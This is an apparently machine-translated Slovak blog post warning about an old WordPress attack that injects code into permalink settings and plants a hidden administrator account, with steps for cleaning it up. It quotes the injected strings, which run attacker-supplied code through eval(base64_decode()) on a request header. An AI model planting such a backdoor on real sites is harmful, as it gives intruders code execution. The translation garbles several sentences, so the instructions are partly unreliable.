Mobilné Správy, Gadgety, Blogy's Secenziami

Vkladanie WordPress SQL – posledný útok

Nedávny útok SQL zasiahne mnoho stránok, do ktorých je kód vložený na vaše stránky. Táto injekcia MySQL ovplyvňuje vaše permalinky, vďaka čomu sú neúčinné. Výsledkom je, že adresy URL vašich blogových príspevkov nebudú fungovať. Pri tomto útoku boli napadnuté početné blogy WordPress, vďaka Andymu Sowardovi, že nás upozornil.

V dôsledku tohto útoku bol do vašej permalinkovej štruktúry pridaný jeden z nasledujúcich kódov:

% & ({$ {eval (base64_decode ($ _ SERVER (HTTP_REFERER)))}} |. +) &%

"/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Tieto úvodzovky zahŕňajú všetky permalinky na vašom webe a je možné ich zmeniť iba ak sú odstránené manuálne.

Tento problém vyriešite na:

Nastavenia> Permalinky a odstráňte vyššie uvedený kód a nahraďte predvolený kód.

Ďalšia vec, ktorú musíte urobiť, je ísť na používateľov. Uvidíte, že existuje viac ako jeden správca. Vaše meno sa v zozname nezobrazí, ale počet sa zvýši. Mali by ste sa teda pozrieť na všetkých používateľov a nájsť posledného zaregistrovaného používateľa. Umiestnite kurzor na tohto používateľa a získate odkaz. Pridajte userid = code pridaním 1 na toto číslo. Ak bol posledným viditeľným používateľom používateľ # 2pridať 1 a urob to 3, Mali by ste zistiť, že skrytý správca má pod menom cudzí kód. Vymažte kód a urobte z neho predplatiteľa. Potom sa vráťte späť a odstráňte.

Týmto by sa mal problém vyriešiť. Môžete ho tiež odstrániť jednoducho tak, že prejdete na stránku PHPMyAdmin. Pretože tam uvidíte používateľa.

Chceli sme túto správu dostať čo najskôr, aby mohli naši používatelia aktualizovať. Uistite sa, že váš blog nie je infikovaný. Dúfame, že WordPress čoskoro vyjde s vydaním.

Ak ste nevykonali niektoré z týchto opatrení na ochranu svojej administratívnej oblasti WordPress.